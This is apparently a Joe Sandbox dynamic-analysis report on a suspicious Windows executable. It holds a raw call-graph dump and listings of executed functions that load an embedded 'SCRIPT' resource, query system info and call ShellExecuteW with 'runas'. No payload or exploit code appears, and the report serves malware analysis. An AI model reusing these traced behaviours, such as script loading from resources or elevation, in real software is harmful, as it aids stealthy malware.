97724->97670 97725->97680 97726->97674 97727->97699 97731 faaddd 97728->97731 97729 faadb6 97729->97643 97730 fbfddb 22 API calls 97730->97731 97731->97729 97731->97730 97732 faa961 22 API calls 97731->97732 97733 faa8c7 22 API calls 97731->97733 97734 faadcd 22 API calls 97731->97734 97732->97731 97733->97731 97734->97731 97735 fadf10 97736 fab710 256 API calls 97735->97736 97737 fadf1e 97736->97737 97738 fa3156 97741 fa3170 97738->97741 97742 fa3187 97741->97742 97743 fa31eb 97742->97743 97744 fa318c 97742->97744 97745 fa31e9 97742->97745 97749 fe2dfb 97743->97749 97750 fa31f1 97743->97750 97746 fa3199 97744->97746 97747 fa3265 PostQuitMessage 97744->97747 97748 fa31d0 DefWindowProcW 97745->97748 97752 fe2e7c 97746->97752 97753 fa31a4 97746->97753 97754 fa316a 97747->97754 97748->97754 97790 fa18e2 10 API calls 97749->97790 97755 fa31f8 97750->97755 97756 fa321d SetTimer RegisterWindowMessageW 97750->97756 97805 100bf30 34 API calls ___scrt_fastfail 97752->97805 97760 fa31ae 97753->97760 97761 fe2e68 97753->97761 97757 fe2d9c 97755->97757 97758 fa3201 KillTimer 97755->97758 97756->97754 97762 fa3246 CreatePopupMenu 97756->97762 97770 fe2dd7 MoveWindow 97757->97770 97771 fe2da1 97757->97771 97786 fa30f2 Shell_NotifyIconW ___scrt_fastfail 97758->97786 97759 fe2e1c 97791 fbe499 42 API calls 97759->97791 97767 fe2e4d 97760->97767 97768 fa31b9 97760->97768 97804 100c161 27 API calls ___scrt_fastfail 97761->97804 97762->97754 97767->97748 97803 1000ad7 22 API calls 97767->97803 97774 fa31c4 97768->97774 97775 fa3253 97768->97775 97769 fe2e8e 97769->97748 97769->97754 97770->97754 97776 fe2dc6 SetFocus 97771->97776 97777 fe2da7 97771->97777 97772 fa3214 97787 fa3c50 DeleteObject DestroyWindow 97772->97787 97773 fa3263 97773->97754 97774->97748 97792 fa30f2 Shell_NotifyIconW ___scrt_fastfail 97774->97792 97788 fa326f 44 API calls ___scrt_fastfail 97775->97788 97776->97754 97777->97774 97781 fe2db0 97777->97781 97789 fa18e2 10 API calls 97781->97789 97784 fe2e41 97793 fa3837 97784->97793 97786->97772 97787->97754 97788->97773 97789->97754 97790->97759 97791->97774 97792->97784 97794 fa3862 ___scrt_fastfail 97793->97794 97806 fa4212 97794->97806 97797 fa38e8 97799 fe3386 Shell_NotifyIconW 97797->97799 97800 fa3906 Shell_NotifyIconW 97797->97800 97810 fa3923 97800->97810 97802 fa391c 97802->97745 97803->97745 97804->97773 97805->97769 97807 fe35a4 97806->97807 97808 fa38b7 97806->97808 97807->97808 97809 fe35ad DestroyIcon 97807->97809 97808->97797 97832 100c874 42 API calls _strftime 97808->97832 97809->97808 97811 fa393f 97810->97811 97830 fa3a13 97810->97830 97812 fa6270 22 API calls 97811->97812 97813 fa394d 97812->97813 97814 fa395a 97813->97814 97815 fe3393 LoadStringW 97813->97815 97816 fa6b57 22 API calls 97814->97816 97817 fe33ad 97815->97817 97818 fa396f 97816->97818 97821 faa8c7 22 API calls 97817->97821 97826 fa3994 ___scrt_fastfail 97817->97826 97819 fa397c 97818->97819 97820 fe33c9 97818->97820 97819->97817 97822 fa3986 97819->97822 97823 fa6350 22 API calls 97820->97823 97821->97826 97824 fa6350 22 API calls 97822->97824 97825 fe33d7 97823->97825 97824->97826 97825->97826 97827 fa33c6 22 API calls 97825->97827 97828 fa39f9 Shell_NotifyIconW 97826->97828 97829 fe33f9 97827->97829 97828->97830 97831 fa33c6 22 API calls 97829->97831 97830->97802 97831->97826 97832->97797 97833 fa2e37 97834 faa961 22 API calls 97833->97834 97835 fa2e4d 97834->97835 97912 fa4ae3 97835->97912 97837 fa2e6b 97838 fa3a5a 24 API calls 97837->97838 97839 fa2e7f 97838->97839 97840 fa9cb3 22 API calls 97839->97840 97841 fa2e8c 97840->97841 97842 fa4ecb 94 API calls 97841->97842 97843 fa2ea5 97842->97843 97844 fe2cb0 97843->97844 97846 fa2ead 97843->97846 97942 1012cf9 97844->97942 97849 faa8c7 22 API calls 97846->97849 97847 fe2cc3 97848 fe2ccf 97847->97848 97850 fa4f39 68 API calls 97847->97850 97853 fa4f39 68 API calls 97848->97853 97851 fa2ec3 97849->97851 97850->97848 97926 fa6f88 22 API calls 97851->97926 97855 fe2ce5 97853->97855 97854 fa2ecf 97856 fa9cb3 22 API calls 97854->97856 97968 fa3084 22 API calls 97855->97968 97857 fa2edc 97856->97857 97927 faa81b 41 API calls 97857->97927 97859 fa2eec 97862 fa9cb3 22 API calls 97859->97862 97861 fe2d02 97969 fa3084 22 API calls 97861->97969 97864 fa2f12 97862->97864 97928 faa81b 41 API calls 97864->97928 97865 fe2d1e 97867 fa3a5a 24 API calls 97865->97867 97868 fe2d44 97867->97868 97970 fa3084 22 API calls 97868->97970 97869 fa2f21 97872 faa961 22 API calls 97869->97872 97871 fe2d50 97873 faa8c7 22 API calls 97871->97873 97874 fa2f3f 97872->97874 97875 fe2d5e 97873->97875 97929 fa3084 22 API calls 97874->97929 97971 fa3084 22 API calls 97875->97971 97877 fa2f4b 97930 fc4a28 40 API calls 3 library calls 97877->97930 97880 fe2d6d 97884 faa8c7 22 API calls 97880->97884 97881 fa2f59 97881->97855 97882 fa2f63 97881->97882 97931 fc4a28 40 API calls 3 library calls 97882->97931 97885 fe2d83 97884->97885 97972 fa3084 22 API calls 97885->97972 97886 fa2f6e 97886->97861 97888 fa2f78 97886->97888 97932 fc4a28 40 API calls 3 library calls 97888->97932 97889 fe2d90 97891 fa2f83 97891->97865 97892 fa2f8d 97891->97892 97933 fc4a28 40 API calls 3 library calls 97892->97933 97894 fa2f98 97895 fa2fdc 97894->97895 97934 fa3084 22 API calls 97894->97934 97895->97880 97896 fa2fe8 97895->97896 97896->97889 97936 fa63eb 22 API calls 97896->97936 97898 fa2fbf 97900 faa8c7 22 API calls 97898->97900 97902 fa2fcd 97900->97902 97901 fa2ff8 97937 fa6a50 22 API calls 97901->97937 97935 fa3084 22 API calls 97902->97935 97905 fa3006 97938 fa70b0 23 API calls 97905->97938 97909 fa3021 97910 fa3065 97909->97910 97939 fa6f88 22 API calls 97909->97939 97940 fa70b0 23 API calls 97909->97940 97941 fa3084 22 API calls 97909->97941 97913 fa4af0 __wsopen_s 97912->97913 97914 fa6b57 22 API calls 97913->97914 97915 fa4b22 97913->97915 97914->97915 97916 fa4c6d 22 API calls 97915->97916 97921 fa4b58 97915->97921 97916->97915 97917 fa4c29 97918 fa9cb3 22 API calls 97917->97918 97925 fa4c5e 97917->97925 97919 fa4c52 97918->97919 97922 fa515f 22 API calls 97919->97922 97920 fa9cb3 22 API calls 97920->97921 97921->97917 97921->97920 97923 fa4c6d 22 API calls 97921->97923 97924 fa515f 22 API calls 97921->97924 97922->97925 97923->97921 97924->97921 97925->97837 97926->97854 97927->97859 97928->97869 97929->97877 97930->97881 97931->97886 97932->97891 97933->97894 97934->97898 97935->97895 97936->97901 97937->97905 97938->97909 97939->97909 97940->97909 97941->97909 97943 1012d15 97942->97943 97944 fa511f 64 API calls 97943->97944 97945 1012d29 97944->97945 97973 1012e66 75 API calls 97945->97973 97947 1012d3b 97948 fa50f5 40 API calls 97947->97948 97965 1012d3f 97947->97965 97949 1012d56 97948->97949 97950 fa50f5 40 API calls 97949->97950 97951 1012d66 97950->97951 97952 fa50f5 40 API calls 97951->97952 97953 1012d81 97952->97953 97954 fa50f5 40 API calls 97953->97954 97955 1012d9c 97954->97955 97956 fa511f 64 API calls 97955->97956 97957 1012db3 97956->97957 97958 fcea0c ___std_exception_copy 21 API calls 97957->97958 97959 1012dba 97958->97959 97960 fcea0c ___std_exception_copy 21 API calls 97959->97960 97961 1012dc4 97960->97961 97962 fa50f5 40 API calls 97961->97962 97963 1012dd8 97962->97963 97974 10128fe 27 API calls 97963->97974 97965->97847 97966 1012dee 97966->97965 97967 10122ce 79 API calls 97966->97967 97967->97965 97968->97861 97969->97865 97970->97871 97971->97880 97972->97889 97973->97947 97974->97966 97975 fa1cad SystemParametersInfoW 97976 fa2de3 97977 fa2df0 __wsopen_s 97976->97977 97978 fa2e09 97977->97978 97979 fe2c2b ___scrt_fastfail 97977->97979 97980 fa3aa2 23 API calls 97978->97980 97981 fe2c47 GetOpenFileNameW 97979->97981 97982 fa2e12 97980->97982 97983 fe2c96 97981->97983 97992 fa2da5 97982->97992 97985 fa6b57 22 API calls 97983->97985 97987 fe2cab 97985->97987 97987->97987 97989 fa2e27 98010 fa44a8 97989->98010 97993 fe1f50 __wsopen_s 97992->97993 97994 fa2db2 GetLongPathNameW 97993->97994 97995 fa6b57 22 API calls 97994->97995 97996 fa2dda 97995->97996 97997 fa3598 97996->97997 97998 faa961 22 API calls 97997->97998 97999 fa35aa 97998->97999 98000 fa3aa2 23 API calls 97999->98000 98001 fa35b5 98000->98001 98002 fe32eb 98001->98002 98003 fa35c0 98001->98003 98008 fe330d 98002->98008 98045 fbce60 41 API calls 98002->98045 98004 fa515f 22 API calls 98003->98004 98006 fa35cc 98004->98006 98039 fa35f3 98006->98039 98009 fa35df 98009->97989 98011 fa4ecb 94 API calls 98010->98011 98012 fa44cd 98011->98012 98013 fe3833 98012->98013 98014 fa4ecb 94 API calls 98012->98014 98015 1012cf9 80 API calls 98013->98015 98017 fa44e1 98014->98017 98016 fe3848 98015->98016 98018 fe384c 98016->98018 98019 fe3869 98016->98019 98017->98013 98020 fa44e9 98017->98020 98021 fa4f39 68 API calls 98018->98021 98022 fbfe0b 22 API calls 98019->98022 98023 fe3854 98020->98023 98024 fa44f5 98020->98024 98021->98023 98038 fe38ae 98022->98038 98047 100da5a 82 API calls 98023->98047 98046 fa940c 136 API calls 2 library calls 98024->98046 98027 fe3862 98027->98019 98028 fa2e31 98029 fa4f39 68 API calls 98032 fe3a5f 98029->98032 98032->98029 98053 100989b 82 API calls __wsopen_s 98032->98053 98035 fa9cb3 22 API calls 98035->98038 98038->98032 98038->98035 98048 100967e 22 API calls __fread_nolock 98038->98048 98049 10095ad 42 API calls _wcslen 98038->98049 98050 1010b5a 22 API calls 98038->98050 98051 faa4a1 22 API calls __fread_nolock 98038->98051 98052 fa3ff7 22 API calls 98038->98052 98040 fa3605 98039->98040 98044 fa3624 __fread_nolock 98039->98044 98042 fbfe0b 22 API calls 98040->98042 98041 fbfddb 22 API calls 98043 fa363b 98041->98043 98042->98044 98043->98009 98044->98041 98045->98002 98046->98028 98047->98027 98048->98038 98049->98038 98050->98038 98051->98038 98052->98038 98053->98032 98054 fe2ba5 98055 fe2baf 98054->98055 98056 fa2b25 98054->98056 98058 fa3a5a 24 API calls 98055->98058 98082 fa2b83 7 API calls 98056->98082 98060 fe2bb8 98058->98060 98062 fa9cb3 22 API calls 98060->98062 98064 fe2bc6 98062->98064 98063 fa2b2f 98069 fa3837 49 API calls 98063->98069 98072 fa2b44 98063->98072 98065 fe2bce 98064->98065 98066 fe2bf5 98064->98066 98067 fa33c6 22 API calls 98065->98067 98068 fa33c6 22 API calls 98066->98068 98070 fe2bd9 98067->98070 98080 fe2bf1 GetForegroundWindow ShellExecuteW 98068->98080 98069->98072 98071 fa6350 22 API calls 98070->98071 98074 fe2be7 98071->98074 98076 fa2b5f 98072->98076 98086 fa30f2 Shell_NotifyIconW ___scrt_fastfail 98072->98086 98078 fa33c6 22 API calls 98074->98078 98079 fa2b66 SetCurrentDirectoryW 98076->98079 98077 fe2c26 98077->98076 98078->98080 98081 fa2b7a 98079->98081 98080->98077 98087 fa2cd4 7 API calls 98082->98087 98084 fa2b2a 98085 fa2c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98084->98085 98085->98063 98086->98076 98087->98084 98088 fa1044 98093 fa10f3 98088->98093 98090 fa104a 98129 fc00a3 29 API calls __onexit 98090->98129 98092 fa1054 98130 fa1398 98093->98130 98097 fa116a 98098 faa961 22 API calls 98097->98098 98099 fa1174 98098->98099 98100 faa961 22 API calls 98099->98100 98101 fa117e 98100->98101 98102 faa961 22 API calls 98101->98102 98103 fa1188 98102->98103 98104 faa961 22 API calls 98103->98104 98105 fa11c6 98104->98105 98106 faa961 22 API calls 98105->98106 98107 fa1292 98106->98107 98140 fa171c 98107->98140 98111 fa12c4 98112 faa961 22 API calls 98111->98112 98113 fa12ce 98112->98113 98114 fb1940 9 API calls 98113->98114 98115 fa12f9 98114->98115 98161 fa1aab 98115->98161 98117 fa1315 98118 fa1325 GetStdHandle 98117->98118 98119 fe2485 98118->98119 98121 fa137a 98118->98121 98120 fe248e 98119->98120 98119->98121 98122 fbfddb 22 API calls 98120->98122 98124 fa1387 OleInitialize 98121->98124 98123 fe2495 98122->98123 98168 101011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 98123->98168 98124->98090 98126 fe249e 98169 1010944 CreateThread 98126->98169 98128 fe24aa CloseHandle 98128->98121 98129->98092 98170 fa13f1 98130->98170 98133 fa13f1 22 API calls 98134 fa13d0 98133->98134 98135 faa961 22 API calls 98134->98135 98136 fa13dc 98135->98136 98137 fa6b57 22 API calls 98136->98137 98138 fa1129 98137->98138 98139 fa1bc3 6 API calls 98138->98139 98139->98097 98141 faa961 22 API calls 98140->98141 98142 fa172c 98141->98142 98143 faa961 22 API calls 98142->98143 98144 fa1734 98143->98144 98145 faa961 22 API calls 98144->98145 98146 fa174f 98145->98146 98147 fbfddb 22 API calls 98146->98147 98148 fa129c 98147->98148 98149 fa1b4a 98148->98149 98150 fa1b58 98149->98150 98151 faa961 22 API calls 98150->98151 98152 fa1b63 98151->98152 98153 faa961 22 API calls 98152->98153 98154 fa1b6e 98153->98154 98155 faa961 22 API calls 98154->98155 98156 fa1b79 98155->98156 98157 faa961 22 API calls 98156->98157 98158 fa1b84 98157->98158 98159 fbfddb 22 API calls 98158->98159 98160 fa1b96 RegisterWindowMessageW 98159->98160 98160->98111 98162 fa1abb 98161->98162 98163 fe272d 98161->98163 98164 fbfddb 22 API calls 98162->98164 98177 1013209 23 API calls 98163->98177 98167 fa1ac3 98164->98167 98166 fe2738 98167->98117 98168->98126 98169->98128 98178 101092a 28 API calls 98169->98178 98171 faa961 22 API calls 98170->98171 98172 fa13fc 98171->98172 98173 faa961 22 API calls 98172->98173 98174 fa1404 98173->98174 98175 faa961 22 API calls 98174->98175 98176 fa13c6 98175->98176 98176->98133 98177->98166 98179 ff2a00 98193 fad7b0 ISource 98179->98193 98180 fadb11 PeekMessageW 98180->98193 98181 fad807 GetInputState 98181->98180 98181->98193 98183 ff1cbe TranslateAcceleratorW 98183->98193 98184 fada04 timeGetTime 98184->98193 98185 fadb8f PeekMessageW 98185->98193 98186 fadb73 TranslateMessage DispatchMessageW 98186->98185 98187 fadbaf Sleep 98205 fadbc0 98187->98205 98188 ff2b74 Sleep 98188->98205 98189 fbe551 timeGetTime 98189->98205 98190 ff1dda timeGetTime 98242 fbe300 23 API calls 98190->98242 98193->98180 98193->98181 98193->98183 98193->98184 98193->98185 98193->98186 98193->98187 98193->98188 98193->98190 98196 fad9d5 98193->98196 98207 faec40 256 API calls 98193->98207 98208 fb1310 256 API calls 98193->98208 98209 fabf40 256 API calls 98193->98209 98211 fadd50 98193->98211 98218 fadfd0 98193->98218 98241 fbedf6 IsDialogMessageW GetClassLongW 98193->98241 98243 1013a2a 23 API calls 98193->98243 98244 101359c 82 API calls __wsopen_s 98193->98244 98194 ff2c0b GetExitCodeProcess 98197 ff2c37 CloseHandle 98194->98197 98198 ff2c21 WaitForSingleObject 98194->98198 98197->98205 98198->98193 98198->98197 98199 ff2a31 98199->98196 98200 10329bf GetForegroundWindow 98200->98205 98201 ff2ca9 Sleep 98201->98193 98205->98189 98205->98193 98205->98194 98205->98196 98205->98199 98205->98200 98205->98201 98245 1025658 23 API calls 98205->98245 98246 100e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98205->98246 98247 100d4dc 47 API calls 98205->98247 98207->98193 98208->98193 98209->98193 98212 fadd6f 98211->98212 98213 fadd83 98211->98213 98248 fad260 256 API calls 2 library calls 98212->98248 98249 101359c 82 API calls __wsopen_s 98213->98249 98215 fadd7a 98215->98193 98217 ff2f75 98217->98217 98219 fae010 98218->98219 98235 fae0dc ISource 98219->98235 98252 fc0242 5 API calls __Init_thread_wait 98219->98252 98222 fae3e1 98222->98193 98223 ff2fca 98225 faa961 22 API calls 98223->98225 98223->98235 98224 faa961 22 API calls 98224->98235 98228 ff2fe4 98225->98228 98253 fc00a3 29 API calls __onexit 98228->98253 98230 ff2fee 98254 fc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98230->98254 98234 faa8c7 22 API calls 98234->98235 98235->98222 98235->98224 98235->98234 98236 101359c 82 API calls 98235->98236 98237 faec40 256 API calls 98235->98237 98238 fb04f0 22 API calls 98235->98238 98250 faa81b 41 API calls 98235->98250 98251 fba308 256 API calls 98235->98251 98255 fc0242 5 API calls __Init_thread_wait 98235->98255 98256 fc00a3 29 API calls __onexit 98235->98256 98257 fc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98235->98257 98258 10247d4 256 API calls 98235->98258 98259 10268c1 256 API calls 98235->98259 98236->98235 98237->98235 98238->98235 98241->98193 98242->98193 98243->98193 98244->98193 98245->98205 98246->98205 98247->98205 98248->98215 98249->98217 98250->98235 98251->98235 98252->98223 98253->98230 98254->98235 98255->98235 98256->98235 98257->98235 98258->98235 98259->98235 98260 fd8402 98265 fd81be 98260->98265 98263 fd842a 98266 fd81ef try_get_first_available_module 98265->98266 98273 fd8338 98266->98273 98280 fc8e0b 40 API calls 2 library calls 98266->98280 98268 fd83ee 98284 fd27ec 26 API calls __cftof 98268->98284 98270 fd8343 98270->98263 98277 fe0984 98270->98277 98272 fd838c 98272->98273 98281 fc8e0b 40 API calls 2 library calls 98272->98281 98273->98270 98283 fcf2d9 20 API calls _abort 98273->98283 98275 fd83ab 98275->98273 98282 fc8e0b 40 API calls 2 library calls 98275->98282 98285 fe0081 98277->98285 98279 fe099f 98279->98263 98280->98272 98281->98275 98282->98273 98283->98268 98284->98270 98288 fe008d BuildCatchObjectHelperInternal 98285->98288 98286 fe009b 98342 fcf2d9 20 API calls _abort 98286->98342 98288->98286 98290 fe00d4 98288->98290 98289 fe00a0 98343 fd27ec 26 API calls __cftof 98289->98343 98296 fe065b 98290->98296 98295 fe00aa __wsopen_s 98295->98279 98297 fe0678 98296->98297 98298 fe068d 98297->98298 98299 fe06a6 98297->98299 98359 fcf2c6 20 API calls _abort 98298->98359 98345 fd5221 98299->98345 98302 fe06ab 98303 fe06cb 98302->98303 98304 fe06b4 98302->98304 98358 fe039a CreateFileW 98303->98358 98361 fcf2c6 20 API calls _abort 98304->98361 98308 fe0704 98310 fe0781 GetFileType 98308->98310 98312 fe0756 GetLastError 98308->98312 98363 fe039a CreateFileW 98308->98363 98309 fe06b9 98362 fcf2d9 20 API calls _abort 98309->98362 98313 fe078c GetLastError 98310->98313 98316 fe07d3 98310->98316 98364 fcf2a3 20 API calls __dosmaperr 98312->98364 98365 fcf2a3 20 API calls __dosmaperr 98313->98365 98367 fd516a 21 API calls 2 library calls 98316->98367 98318 fe0692 98360 fcf2d9 20 API calls _abort 98318->98360 98319 fe079a CloseHandle 98319->98318 98320 fe07c3 98319->98320 98366 fcf2d9 20 API calls _abort 98320->98366 98322 fe0749 98322->98310 98322->98312 98324 fe07f4 98326 fe0840 98324->98326 98368 fe05ab 72 API calls 3 library calls 98324->98368 98325 fe07c8 98325->98318 98331 fe086d 98326->98331 98369 fe014d 72 API calls 4 library calls 98326->98369 98329 fe0866 98330 fe087e 98329->98330 98329->98331 98333 fe00f8 98330->98333 98334 fe08fc CloseHandle 98330->98334 98332 fd86ae __wsopen_s 29 API calls 98331->98332 98332->98333 98344 fe0121 LeaveCriticalSection __wsopen_s 98333->98344 98370 fe039a CreateFileW 98334->98370 98336 fe0927 98337 fe095d 98336->98337 98338 fe0931 GetLastError 98336->98338 98337->98333 98371 fcf2a3 20 API calls __dosmaperr 98338->98371 98340 fe093d 98372 fd5333 21 API calls 2 library calls 98340->98372 98342->98289 98343->98295 98344->98295 98346 fd522d BuildCatchObjectHelperInternal 98345->98346 98373 fd2f5e EnterCriticalSection 98346->98373 98349 fd5234 98350 fd5259 98349->98350 98354 fd52c7 EnterCriticalSection 98349->98354 98357 fd527b 98349->98357 98352 fd5000 __wsopen_s 21 API calls 98350->98352 98351 fd52a4 __wsopen_s 98351->98302 98353 fd525e 98352->98353 98353->98357 98377 fd5147 EnterCriticalSection 98353->98377 98355 fd52d4 LeaveCriticalSection 98354->98355 98354->98357 98355->98349 98374 fd532a 98357->98374 98358->98308 98359->98318 98360->98333 98361->98309 98362->98318 98363->98322 98364->98318 98365->98319 98366->98325 98367->98324 98368->98326 98369->98329 98370->98336 98371->98340 98372->98337 98373->98349 98378 fd2fa6 LeaveCriticalSection 98374->98378 98376 fd5331 98376->98351 98377->98357 98378->98376

            Executed Functions

            Function 00FA42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 234 fa42de-fa434d call faa961 GetVersionExW call fa6b57 239 fe3617-fe362a 234->239 240 fa4353 234->240 241 fe362b-fe362f 239->241 242 fa4355-fa4357 240->242 245 fe3632-fe363e 241->245 246 fe3631 241->246 243 fa435d-fa43bc call fa93b2 call fa37a0 242->243 244 fe3656 242->244 262 fe37df-fe37e6 243->262 263 fa43c2-fa43c4 243->263 249 fe365d-fe3660 244->249 245->241 248 fe3640-fe3642 245->248 246->245 248->242 251 fe3648-fe364f 248->251 252 fa441b-fa4435 GetCurrentProcess IsWow64Process 249->252 253 fe3666-fe36a8 249->253 251->239 255 fe3651 251->255 258 fa4437 252->258 259 fa4494-fa449a 252->259 253->252 256 fe36ae-fe36b1 253->256 255->244 260 fe36db-fe36e5 256->260 261 fe36b3-fe36bd 256->261 264 fa443d-fa4449 258->264 259->264 268 fe36f8-fe3702 260->268 269 fe36e7-fe36f3 260->269 265 fe36bf-fe36c5 261->265 266 fe36ca-fe36d6 261->266 270 fe37e8 262->270 271 fe3806-fe3809 262->271 263->249 267 fa43ca-fa43dd 263->267 272 fa444f-fa445e LoadLibraryA 264->272 273 fe3824-fe3828 GetSystemInfo 264->273 265->252 266->252 274 fe3726-fe372f 267->274 275 fa43e3-fa43e5 267->275 277 fe3704-fe3710 268->277 278 fe3715-fe3721 268->278 269->252 276 fe37ee 270->276 279 fe380b-fe381a 271->279 280 fe37f4-fe37fc 271->280 281 fa449c-fa44a6 GetSystemInfo 272->281 282 fa4460-fa446e GetProcAddress 272->282 287 fe373c-fe3748 274->287 288 fe3731-fe3737 274->288 285 fa43eb-fa43ee 275->285 286 fe374d-fe3762 275->286 276->280 277->252 278->252 279->276 289 fe381c-fe3822 279->289 280->271 284 fa4476-fa4478 281->284 282->281 283 fa4470-fa4474 GetNativeSystemInfo 282->283 283->284 290 fa447a-fa447b FreeLibrary 284->290 291 fa4481-fa4493 284->291 292 fa43f4-fa440f 285->292 293 fe3791-fe3794 285->293 294 fe376f-fe377b 286->294 295 fe3764-fe376a 286->295 287->252 288->252 289->280 290->291 297 fe3780-fe378c 292->297 298 fa4415 292->298 293->252 296 fe379a-fe37c1 293->296 294->252 295->252 299 fe37ce-fe37da 296->299 300 fe37c3-fe37c9 296->300 297->252 298->252 299->252 300->252
            APIs
            • GetVersionExW.KERNEL32(?), ref: 00FA430D
              • Part of subcall function 00FA6B57: _wcslen.LIBCMT ref: 00FA6B6A
            • GetCurrentProcess.KERNEL32(?,0103CB64,00000000,?,?), ref: 00FA4422
            • IsWow64Process.KERNEL32(00000000,?,?), ref: 00FA4429
            • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00FA4454
            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00FA4466
            • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00FA4474
            • FreeLibrary.KERNEL32(00000000,?,?), ref: 00FA447B
            • GetSystemInfo.KERNEL32(?,?,?), ref: 00FA44A0
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
            • String ID: GetNativeSystemInfo$kernel32.dll$|O
            • API String ID: 3290436268-3101561225
            • Opcode ID: 949a3ba2e5665ba13710c7bf1a8b2c1ced015efb04cdd87ed85ca3635647b605
            • Instruction ID: db428fd356893c313805bfd74e94444304ff589f111ae06d8f229a09a99307e8
            • Opcode Fuzzy Hash: 949a3ba2e5665ba13710c7bf1a8b2c1ced015efb04cdd87ed85ca3635647b605
            • Instruction Fuzzy Hash: 73A1A2B2D1E2C0DFD731CB7970486957FA46B67300B08C899E8C5B7AC9D27A4508EBB1
            Function 00FA42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 661 fa42a2-fa42ba CreateStreamOnHGlobal 662 fa42da-fa42dd 661->662 663 fa42bc-fa42d3 FindResourceExW 661->663 664 fa42d9 663->664 665 fe35ba-fe35c9 LoadResource 663->665 664->662 665->664 666 fe35cf-fe35dd SizeofResource 665->666 666->664 667 fe35e3-fe35ee LockResource 666->667 667->664 668 fe35f4-fe35fc 667->668 669 fe3600-fe3612 668->669 669->664
            APIs
            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00FA50AA,?,?,00000000,00000000), ref: 00FA42B2
            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00FA50AA,?,?,00000000,00000000), ref: 00FA42C9
            • LoadResource.KERNEL32(?,00000000,?,?,00FA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00FA4F20), ref: 00FE35BE
            • SizeofResource.KERNEL32(?,00000000,?,?,00FA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00FA4F20), ref: 00FE35D3
            • LockResource.KERNEL32(00FA50AA,?,?,00FA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00FA4F20,?), ref: 00FE35E6
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
            • String ID: SCRIPT
            • API String ID: 3051347437-3967369404
            • Opcode ID: cd86ec1d4575f47597390be82608e10d8e2091500a9def6e4aa0bd22c5c81b79
            • Instruction ID: 81ff86e882178fcb0d7064f0cc615e82782d9aa0d35fb52fb829974e41b5d811
            • Opcode Fuzzy Hash: cd86ec1d4575f47597390be82608e10d8e2091500a9def6e4aa0bd22c5c81b79
            • Instruction Fuzzy Hash: 35117CB5640701BFE7218B65DD48F277BBDEBC6B61F14416AB446E6250DBB2EC009630
            Function 00FE2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
            Download Yara Rule

            Control-flow Graph

            APIs
            • SetCurrentDirectoryW.KERNEL32(?), ref: 00FA2B6B
              • Part of subcall function 00FA3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,01071418,?,00FA2E7F,?,?,?,00000000), ref: 00FA3A78
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
            • GetForegroundWindow.USER32(runas,?,?,?,?,?,01062224), ref: 00FE2C10
            • ShellExecuteW.SHELL32(00000000,?,?,01062224), ref: 00FE2C17
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
